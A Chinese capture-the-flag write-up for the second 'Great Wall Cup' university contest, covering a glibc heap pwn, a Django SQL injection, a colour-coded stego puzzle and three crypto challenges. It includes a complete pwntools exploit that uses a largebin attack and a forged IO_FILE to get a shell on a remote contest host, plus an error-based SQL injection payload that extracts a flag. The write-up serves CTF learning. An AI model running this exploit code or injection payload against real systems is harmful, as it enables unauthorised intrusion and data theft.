解题思路
PWN
glibc_master
free的时候没有清零uaf漏洞,还可以无限制edit,只是edit的时候其实有一个加密所谓加密其实就是一个异或的过程只要再异或一次就能解密,add的时候限制大小。由于没有给libc我show了一次因为我本地是2.31-9.9的libc然后减了一下得到libcbase发现刚好是0x1000对齐,所以既然是2.31版本就有各种hook,但是free_hook和malloc_hook被ban了,但是用了puts函数关于io调用链所以用largebinattack攻击mp_结构体中的tcache大小就能将tcache扩大然后在IO_2_1_stdout伪造house of cat就能getshell
#encoding: utf-8
#!/usr/bin/python
from pwn import*
import sys
#context.log_level = "debug"
context.arch="amd64"
binary_name = "glibc_master"
libc_name = "libc-2.31.so"
ld_name = "ld"
local = 1
version = "9.7"
elf =ELF("./"+binary_name)
libc = ELF("/home/chen/glibc/{}/{}/{}".format(libc_name,version,libc_name))
#ld = ELF("./"+ld_name)
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'x00'))
uu64 = lambda data :u64(data.ljust(8, b'x00'))
info = lambda tag, addr :log.info(tag + " -------------> " + hex(addr))
ia = lambda :io.interactive()
if local==1:
io = remote("123.56.77.227",18779)
else:
io = process("./"+binary_name)
def debug():
gdb.attach(io,'''
''')
pause()
def add(index,size):
sla(">>","1")
sla("input index:",str(index))
sla("input size:",str(size))
def edit(index,context):
sla(">>","2")
sla("input index:",str(index))
sla("input context:",context)
def show(index):
sla(">>","3")
sla("input index:",str(index))
def free(index):
sla(">>","4")
sla("input index:",str(index))
def encrypt(data):
s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
s1=''
x = len(s)
for i in range(len(data)):
s1 += chr(ord(s[i%x]) ^ ord(data[i]))
return s1
add(0,0x428)
add(1,0x410)
add(2,0x418)
add(3,0x410)
free(0)
show(0)
ru("n")
libcbase = uu64(io.recv(6)) - 2018272
system_addr=libcbase+libc.sym["system"]
stdout_addr = libcbase + libc.sym["_IO_2_1_stdout_"]
mp_addr =libcbase + 2015952 #2015952
free_hook = libcbase + libc.sym["__free_hook"]
info("stdout_addr",stdout_addr)
info("libcbase",libcbase)
add(4,0x450)
payload = p64(0)*3 + p64(mp_addr-0x20)
edit(0,encrypt(payload))
free(2)
add(5,0x450)
free(1)
free(3)
show(3)
ru("n")
heap_addr = uu64(io.recv(6))
info("heap_addr",heap_addr)
payload = p64(stdout_addr)
edit(3,encrypt(payload))
add(6,0x410)
add(7,0x410)
fake_IO_FILE = "/bin/shx00"+p64(0)*3
fake_IO_FILE +=p64(0)
fake_IO_FILE +=p64(0)
fake_IO_FILE +=p64(1)+p64(0)
fake_IO_FILE +=p64(heap_addr)#rdx
fake_IO_FILE +=p64(system_addr)#call addr
fake_IO_FILE +=p64(0xffffffffffffffff)
fake_IO_FILE = fake_IO_FILE.ljust(0x48, 'x00')
fake_IO_FILE += p64(0 ) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, 'x00')
fake_IO_FILE += p64(libcbase+2025440) # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, 'x00')
fake_IO_FILE +=p64(stdout_addr+0x30) #rax1
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, 'x00')
fake_IO_FILE += p64(0) # _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, 'x00')
fake_IO_FILE += p64(libcbase+2002784+0x10) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(stdout_addr+48) # rax2
edit(7,encrypt(fake_IO_FILE))
#debug()
ia()
WEB
djangogogo
开启了Debug,但是只有以year或者为month为开头的时候才会产生sql语句错误,从而找到对应的SQL语句
SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`,
`Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(YEAR FROM
`Bill`.`sale_datetime`) = (EXTRACT(YEAR OR 1 FROM `Bill`.`purchase_date`))
SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`,
`Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(MONTH FROM
`Bill`.`sale_datetime`) = (EXTRACT(MONTH OR 1 FROM `Bill`.`purchase_date`))
这里用到了EXTRACT函数,并且在尝试过程中我们可以发现会默认将所有字符都直接大写,从而不能直接利用Bill数据库绕过,但是可以利用mysql自带的函数来获取时间,然后构造报错注入语句
payload:
?name=YEAR From now())) or updatexml(1,concat("~",(select flag from FLAG),"~"),1)%23
flag:
flag{2c7ac8d2-855e-4ee0-87cc-0f77a3a3b9dc}MISC
办公室爱情
搜索到密码,根据题目提示,流程应该是word->pdf->ppt
True_lOve_i2_supReMepdf的隐写就没几种,要么去掉图片,要么就是wbs43open
然后解出来得到密码
解压得到ppt
简单看一下有8种图片
分别为赤橙黄绿青蓝紫跟白
有绝大部分的黄色后面跟着白色,白色与白色之间的间隔大部分都是3,所以猜测白色是间隔
又因为有7种颜色(除去白色间隔),所以猜测可能为7进制
将颜色拿下来之后,写脚本,7进制转字符串转得到flag
x = '黄红青白黄橙绿白橙紫紫白黄红蓝白黄绿青白橙红红白紫紫白黄黄紫白黄红绿白橙紫青白黄红绿白黄绿橙白橙黄青白黄红绿白橙红红白橙紫青白青蓝白青蓝白青蓝白黄绿紫白'
x = x.replace('红','0')
x = x.replace('橙','1')
x = x.replace('黄','2')
x = x.replace('绿','3')
x = x.replace('青','4')
x = x.replace('蓝','5')
x = x.replace('紫','6')
x = x.replace('白','_')
for i in x.split('_')[:-1]:
print(chr(int(i,7)),end='')
#flag{10ve_exCe1_!!!}
CRYPTO
known_phi
在以前积累的CVE库中找到了现成的解已知phi分解n的脚本
后面就是dsa签名k的复用
因为n分解出来的顺序可能不同,所以需要爆破m1和m2
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
from hashlib import sha256
from math import gcd
# from math import isqrt
from random import randrange
from sage.all import is_prime
def factorize_multi_prime(N, phi):
"""
Recovers the prime factors from a modulus if Euler's totient is known.
This method works for a modulus consisting of any number of primes, but is considerably be slower than factorize.
More information: Hinek M. J., Low M. K., Teske E., "On Some Attacks on Multi-prime RSA" (Section 3)
:param N: the modulus
:param phi: Euler's totient, the order of the multiplicative group modulo N
:return: a tuple containing the prime factors
"""
prime_factors = set()
factors = [N]
while len(factors) > 0:
# Element to factorize.
N = factors[0]
w = randrange(2, N - 1)
i = 1
while phi % (2 ** i) == 0:
sqrt_1 = pow(w, phi // (2 ** i), N)
if sqrt_1 > 1 and sqrt_1 != N - 1:
# We can remove the element to factorize now, because we have a factorization.
factors = factors[1:]
p = gcd(N, sqrt_1 + 1)
q = N // p
if is_prime(p):
prime_factors.add(int(p))
elif p > 1:
factors.append(int(p))
if is_prime(q):
prime_factors.add(int(q))
elif q > 1:
factors.append(int(q))
# Continue in the outer loop
break
i += 1
return tuple(prime_factors)
n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693
phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800
n_factors = factorize_multi_prime(n, phi)
q = 24513014442114004234202354110477737650785387286781126308169912007819
s1 = 764450933738974696530033347966845551587903750431946039815672438603
r1 = 8881880595434882344509893789458546908449907797285477983407324325035
r2 = 8881880595434882344509893789458546908449907797285477983407324325035
s2 = 22099482232399385060035569388467035727015978742301259782677969649659
# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)
import itertools
for i in itertools.permutations([0,1,2,3]):
m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])
m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])
hm1 = bytes_to_long(sha256(m1).digest())
hm2 = bytes_to_long(sha256(m2).digest())
k = inverse((s1-s2),q)*(hm1-hm2) % q
x1 = (s1*k-hm1)*inverse(r1,q) % q
x2 = (s2*k-hm2)*inverse(r2,q) % q
if b'flag' in long_to_bytes(x1):
print(long_to_bytes(x1))
# b'flag{ea16de7-1981-11ed-b58f}'
rsa
from gmpy2 import *
from Crypto.Util.number import *
n = 0x62c048bc886075bffb9ad01255786dd8ef2480ba510f13689c1e84ffaaf21dfb5695a4d83f4ba22093bdd75bfc8f5979185d29724ecccf045e1857b1b2a4757dd82dc44318c054c9fce9bc451e6beecb97bbda6562420fc8c295521c5455443413f90403cf1af6271fb6d2d54378b86ced18ae6844a877890ea853a215880a09c68c517a75c1183c067b706ce630f3f0913591f7354cfa60c8f6b7ab2f15e466a1ea6e8034417a5fc3c11b8ba746596c22c734b09257e9a6fb18358738d416eda0ba0e7b028dd2d550b1e018b180916ac25f47910657a5db2410946c0593b7e23ed1659a811083f363ad4eb65642091a040befbd643089bbee376634d2394d11
e1 = 0x124241a12ea2be53f9b9b1fd92e10d089cfa32aa07e6c2cace848aaa6c73ff06d4c6c92b7d1f29160b2eef95a5f580915d3f15c0ea23975cbadfe8347a10daab2bd0827d7e909b329ec53c5eb306f0a5125b3817e7ea0c15b2317a46c36c4f34fc626dadc6c769bcc7be18ddf7954fae8dde3fd4ce3c5146c019bdb0d9552af1dc9ef7186e06b1d59e763fb05c7cd21fbb3f509fee52d4e24921ebfa76bb8302ea6760e92606e440907cc1c110946af53900904e84dbc309fcef15ea060c667070e5e0310891606df151609ff609bcc6125c6043c35119b25df78b4d5ca61ab6492753cc5e5b32e044fce0aeb0442464f36298add254e9fb6505fa4cddae1cf7
e2 = 0x17b3937cec3ca5fdddad8db29c6dc4efae1408bf5b4aa2ff602112c50f302e9698c79c7ab79fef0210c621dcc218d91d358b7f93a978c4e3f2b982794697c4797cef89189d1464ed1c767bf72433092922352885f8e355952c558ad2c9ade58a19375ddc5dcf3f9fa28c68a5cff158734d94224b85f77bd939133f39ab7884ece61d9fb3496373008827c2ae694dfe7da08eee348ef99c3a6737a4b088b62978cf209ef3d1140a30d42872615b94378108266e3d344caf51b497a585a4b5ef8619cc46959bad9b89f59f36175fbf9b64363443f3f7743896c72a198decedf89c518fa07b1d401d0359578a4926b7d67de86232ee24751f17dafbc749c0783b33
e3 = 0x5647c4490bda9e7e497651551600572c5ef4e2d889b9b1ba0e9a493660497e10877e975c01da9aebae5e3ba9aad976a1a783b39191e8fd799689dfa26b069264d60543602d514ac412ac75d827d67c78ad544bda633f0fa69fb5bbc37e0f6b95714576ff53bae3f7f991d143a4b1e841730d5d580d4effeb8fb02e8b3c3c9a1f1899d2eb411ce37f16d30cfa1f7af7322be4f42f5d012f484a1181fa4aa0b5f420a472030a5c08c80bff76ab82ef5768bfd495abcdc5f22aae1891561322dfb28ff63c4e467411c8b73c11d64b05f411e2a1de0c7754c6a62d1f72cded9e2592ccc21be3fce4ea6f083a617a246fd3fe464ef2487adbfabfb628c882ea991675
c = 0x45f2ee650d622d1e0f0e2e2e861001e9866c541f9f1dd2ec1dec18194f8b7224914916ecd68bbc74b28a000d2664e671586aed63b54c0928a939caf28d39eeba03c0ce3afcf2cdc5805e8e2792d76e88545aa4dee11078ba1e2e5b56ee23d58e443d7aff180d4e7463ae66ea8e96e0c8d4e1443e7664b99599af14e591e28cf2f833bd30b44b89c396b5fc1ee81ea3f7bc08dab426b1871eb66829c81d57e2ebf5c7a3e9c593ce496f0b0c4237906b019ae75ca551d6b0b1adfe64958c2ead6c39e517eb75eaf4b4d72402bea40f043cf0a80317aa2f1a996c727e195e15f903c0cac618f668af1015ee479d1c7b1c1b370fd4a5a76f5bf295e6bd7d0f4ae56f
l0 = 0x3dbabf6ea5b801221c283bd234f04264d292c8f3048c8b59c21e003cda983a3a41e4392c6ea77a706631de60d261f2b367027e037d37fda5a13a8e01b2c6c0f48a3112315cffe7420a50a3ebada09aba61f8e6da793654a467b9f780c20c5085012e064ab9205c076073b4fb4895e01d0d568fd5c30159879180093855d39d5548a1389a94f57c680c
kphi = e1 - e2 + l0 * e1 * e2
d3 = inverse(e3,kphi)
d1 = inverse(e1,kphi)
d2 = inverse(e2,kphi)
assert d1 - d2 == l0
print(long_to_bytes(pow(c,d3,n)))
# b'flag{-oh!!h0w_c4N_Y0u_sOlVe_th15_d_bouNd_of_RSA???_}'
往期推荐
原文始发于微信公众号(杭师大网安):第二届“长城杯”网络安全大赛 高校组 WriteUp
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论